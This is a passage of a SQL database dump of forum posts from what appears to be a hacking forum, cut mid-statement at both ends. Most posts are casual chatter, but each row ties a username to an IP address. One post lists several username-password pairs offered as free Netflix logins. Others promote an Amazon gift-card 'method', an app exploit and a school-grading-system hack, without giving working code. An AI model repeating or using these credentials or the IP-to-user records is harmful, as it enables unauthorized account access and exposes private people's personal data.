your YT channel [hr] Do you have adsense on your YT channel [hr] Lol i found a bug with the new plugin [/quote] Yes I have, I have made $50 on this video so far.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '93a29166a07054995b9c0ead3093870a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6199', '1071', '0', '3', 'VirtualLegend - banned?', '0', '264', 'D?ea', '1351011779', 'VirtualLegend tells me over Skype that he is IP banned. Dafoq?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c8a67f5c9a3fba6537305b3934ea3bea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6200', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '222', 'Exposé', '1351012716', 'IP banned from LH. I really doubt it unless he did something to go against the community. He might be still haveing some cloudflare issues or something', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5911efb0639719e5fd6f4f0372db26ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6201', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '222', 'Exposé', '1351012762', 'Lol im on like 15 hours a day. I have work at night usually so im not on 24/7', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e0616006059669b91d263a773e69e0b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6202', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '1', 't3h jok3r', '1351013812', 'He must be banned from Cloudflare by mistake. I can only unban him when I\'m home.', '165.155.212.126', '-1516514178', '1', '0', '0', '0', '1', 'c97519d5830f75bdaf21b5e3f65055be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6203', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '53', 'sirchamp', '1351017305', 'Lol. That happened to me too. A long time ago :D', '54.9.241.166', '906621350', '1', '0', '0', '0', '1', 'aede68fbcce2e41a841979a22e71bf21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6204', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '82', 'iTzIpod', '1351019981', 'Possibly CloudFlare banned his IP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e369b4aa01011c7c8ae00f7ace117bf5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6205', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351020015', 'Lol I hope he chooses the one I posted above your post. xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d4a4679286767ea95b3496fc1c049f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6206', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1351020077', 'It says Moderated by -Name- Or, it say it on the Recruitment Thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d4265700bb3ce8580f19f7bef2e2fb1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6207', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351020141', 'I use Google Chrome .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '256dad4b2fa4c7c4079bd1f755f5d44b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6208', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '82', 'iTzIpod', '1351020202', 'Umm. I\'m not sure how long I\'m on a day. Weekdays, I come home at 3 PM. Somewhere between 2-3 hours or so..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '230b175ec44a96c6baae98eb1158ee4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6209', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '199', 'Anonymous™', '1351023474', '1. Do you have any spare email? Yes. 2. Do you know any hacker blogs? A few i guess. 3. Can you help advertise on twitter? Yes. 4. What search engine do you use? Google 5. Do you upload videos on youtube? Yep! 6. Are you registered on any active site that\'s not related to hacking? Yes. 7. Are you registered on [censored] or ubers? Registered on ubers. 8. If we provide you with programs and ebooks, can you share them on other sites? Why not?', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'b3312dc8b5707940a2687f85b9a82405', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6210', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '199', 'Anonymous™', '1351023687', 'Sorry for this boring post but I saw a good movie called Middle of Nowhere, I just thought it was very good and I think that if you have not seen it, you should do it. Link: http://www.tubeplus.me/player/357222/Middle_of_Nowhere/', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '31a9de552d4a0c85ac318d5dcadaabc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6211', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '2', 'Apathy', '1351027749', 'This happened to me as well. I was like wtf so I went on a different VPN and my account was all good so I was confused.', '173.206.177.215', '-1378962985', '0', '0', '0', '0', '1', 'a583927dc816a86a11a1805a1ce4761d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6212', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '61', 'NXK', '1351028698', 'Ill try to lift the ban now, Unless joker is the only one who can do it?', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'b806d6162617473742511390b8fcf5dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6213', '613', '6176', '66', 'RE: Some Changes that will be made', '0', '199', 'Anonymous™', '1351028953', '[quote=\'iTzIpod\' pid=\'6176\' dateline=\'1350946897\'] [img]http://i.imgur.com/p3p8L.gif[/img] This is it. I like [/quote] How can you not like this? It\'s perfect.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7e711eb93ea6c61af75e586d997366e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6214', '613', '6213', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351029394', '[quote=\'Anonymous™\' pid=\'6213\' dateline=\'1351028953\'] [quote=\'iTzIpod\' pid=\'6176\' dateline=\'1350946897\'] [img]http://i.imgur.com/p3p8L.gif[/img] This is it. I like [/quote] How can you not like this? It\'s perfect. [/quote] When has anyone said they don\'t like it, I said I loved it aha.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '0f8a9fdfd5a0bd8db47d6e767a031de8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6215', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '285', 'dccfoux', '1351030070', 'I have experience but I would hate setting yet another one up.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'b896d50e603cfc23106aa56248a82ea9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6216', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '285', 'dccfoux', '1351030175', 'omg this could be really helpful to me!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '01f3362cf6b331ad626b0b89f7ece69e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6217', '677', '3428', '24', 'RE: Windows Memory Limits', '0', '285', 'dccfoux', '1351030305', 'omg this is why I hate Microsoft. They are too pricey with their software. But then again with Apple they would make you pay $200 to upgrade, unless you do it yourself. Which is easy.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '76caf0212fb266a11aadce2b9c900eda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6218', '1072', '0', '24', 'iPad Mini?', '0', '285', 'dccfoux', '1351030378', 'Ok, so Apple released their new iPad Mini. What do you guys think of it?', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'b12401873db5936e1f1bb76a1ce29489', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6219', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '3', '??????????¢™', '1351030388', 'This has to do with cloudflares downtime yesterday.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e71876cf613078a0263e29e2d34af1c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6220', '1072', '6218', '24', 'RE: iPad Mini?', '0', '82', 'iTzIpod', '1351030904', 'Useless. They\'re kinda running out of ideas in a way. I mean iPad 1, iPad 2, & iPad 3, etc.. Kinda poinless.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37ef66c0c8041cdad6d6e44b4333fc6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6221', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1351030965', 'I saw the movie Ted. Was still funny :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5adec641e377de0d7cc08dfef6ca4cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6222', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351031012', 'Oo. NXK using that Thesaurus. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c6d3e1da72e268288f4d6a258c3a0dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6223', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351031055', 'Are we going to have an actual Minecraft Server?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f454b31f1e45a6a1f44be93675aad416', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6224', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '199', 'Anonymous™', '1351031132', 'Welcome to L33thacking.net! :)', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '19bfb3851ea7f163ec5f2b2c4941be48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6225', '613', '6222', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351031210', '[quote=\'iTzIpod\' pid=\'6222\' dateline=\'1351031012\'] Oo. NXK using that Thesaurus. :o [/quote] how 2 englihs pls?', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '66a22eadf6541ece045782f57973b5c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6226', '613', '6225', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351031977', '[quote=\'NXK\' pid=\'6225\' dateline=\'1351031210\'] [quote=\'iTzIpod\' pid=\'6222\' dateline=\'1351031012\'] Oo. NXK using that Thesaurus. :o [/quote] how 2 englihs pls? [/quote] Reported for LQ Post. Lool 8)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5eece5ff071a72dbd78d4574bd8c1583', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6227', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1351033874', 'Gonna make my own Minecraft Server now. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77258efdd2cea16d60a04e3543068503', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6228', '1009', '6227', '74', 'RE: minecraft server setup tut', '0', '257', 'XxTREYZxX', '1351034467', '[quote=\'iTzIpod\' pid=\'6227\' dateline=\'1351033874\'] Gonna make my own Minecraft Server now. :) [/quote] Thanks i\'m glad i helped you :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '8efaf63bfaaa657193e10657c09e2fd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6229', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '257', 'XxTREYZxX', '1351034623', 'Welcome to LH hope you stay active and HQ, Enjoy your stay :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'feaf78435c3de8bc23e37ca2832272f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6230', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351034717', 'I have alot of experience, just check out my thread if you wanna learn how to', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '453f3077b22fce1bdf6793f36322fb1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6231', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '257', 'XxTREYZxX', '1351034830', 'I just watched Ted, paranormal activity the new one, there is lots of jumpy bits :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '075c2f1ed84605ab590c4055a7b0765b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6232', '1072', '6218', '24', 'RE: iPad Mini?', '0', '257', 'XxTREYZxX', '1351034952', 'i think the ipad is shit house,my opinion :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3ebd5e1ebc430879a90794ac27d726fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6233', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '257', 'XxTREYZxX', '1351035181', 'I\'m on 8-9 hours because of school if there was no school i would be at least 19 hours a day :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '83cbe204703155d96d3493dcd38f7798', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6234', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '257', 'XxTREYZxX', '1351035469', 'Thanks for the share mate, even though i already knew how to do this :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9cfb3b501ca27f5742d35fbbb805daf6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6235', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351035766', 'wierd I use the same and still get the bug.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1858778d7e26b1cf5b72a3df245135d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6236', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '257', 'XxTREYZxX', '1351035870', 'I have the same problem mate', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '50d28694df20569218517594f68ff159', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6237', '1072', '6218', '24', 'RE: iPad Mini?', '0', '1', 't3h jok3r', '1351042015', 'I think it\'s a waste of money, they are running out of ideas as Ipod said.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '55ddd15e6d93d4be7e774b4e2cc533ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6238', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '160', 'Jacob', '1351042147', 'Can you please make me one? Thanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'f480af362ff2a17cd3352f8d4008af2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6239', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '1', 't3h jok3r', '1351042404', 'I deactivated the plugin and plan on removing it because it has too many bugs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '99a4834038aaf9b456ac65da98ad9081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6240', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1351043002', 'Jacob! Welcome back bro. :) Lol. You probably just came back for a signature >_> Hope you plan on being active in the future though! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efab0c7c0ed76f5ede3f47e6f9466651', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6241', '1073', '0', '64', 'Free Premium Netflix logins', '0', '5', 'Timmy', '1351043037', 'mendez - mendez lauretta - lauretta ytrewq - qwerty royroy - royroy tommyboy - tommyboy Quigley - Quigley Feel free to change the password.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2c7f938478d65a5aba25d8dc0c72dcc7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6242', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351043082', 'There is a plugin that\'s called Hide You use [hide] [/hide] instead of [lock] [/lock] o.O Really the same thing. You can\'t quote to bypass it. You just have to simply post and it will show. (It only blocks the content in the [hide] [/hide] )', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3945b609615e205e97ee7ce8cc81484', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6243', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '5', 'Timmy', '1351043686', '2-3 hours excluding browsing for homework etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '966b55a0d1a4de83c50229b3651bffd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6244', '1074', '0', '84', '[NEW] App Trailers Exploit [HOT!]', '0', '5', 'Timmy', '1351044408', 'Hope you guys enjoy, found in the HF Ub3r area. [img]http://i.imgur.com/99DIN.png[/img] [img]http://i.imgur.com/W9Zet.png[/img] [img]http://i.imgur.com/ZHR6I.png[/img] [img]http://i.imgur.com/IfS6d.png[/img] [img]http://i.imgur.com/945yi.png[/img]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0e62c1316c538e30530c3479d6b2d439', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6245', '1075', '0', '9', '? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '7', 'Romdu62', '1351045084', 'Methods pretty decent. Can work. Screenshot of thread: http://gyazo.com/669ce05c6521e1104ddf79af3a0541af.png?1351039127 Download: http://www.filedropper.com/amazonmethod Don\'t forget to Thank! ;) Enjoy all.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c506cadeae7568f171602e844970ec42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6246', '1076', '0', '34', '157 Graffiti Fonts [the best of all]', '0', '7', 'Romdu62', '1351045281', '[align=center][size=medium]Hello, an other leak by me:[/size] [size=large][u][b]157 Graffiti Fonts[/b][/u][/size] [IMG]http://i.imgur.com/yqDlJ.gif[/IMG] [size=large]Direct Download Link: http://ge.tt/3Dqf8sP/v/0[/size][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5bf8d13e54754013fd4e26e34fb02dc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6247', '1077', '0', '47', 'Free chocolates and drinks', '0', '7', 'Romdu62', '1351046027', 'I\'m hosting a contest and the winner will get free chocolates and drinks, any company of your choice or money of the amount the shit will cost at all. This is real and I\'m Jok3rs classmate so you guys can trust me and you have to refer 5 people.', '72.231.24.165', '1223104677', '0', '0', '7', '1351046062', '1', '2a0f7eba5718defebbf4c239bd77d118', '0', '1351046062'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, 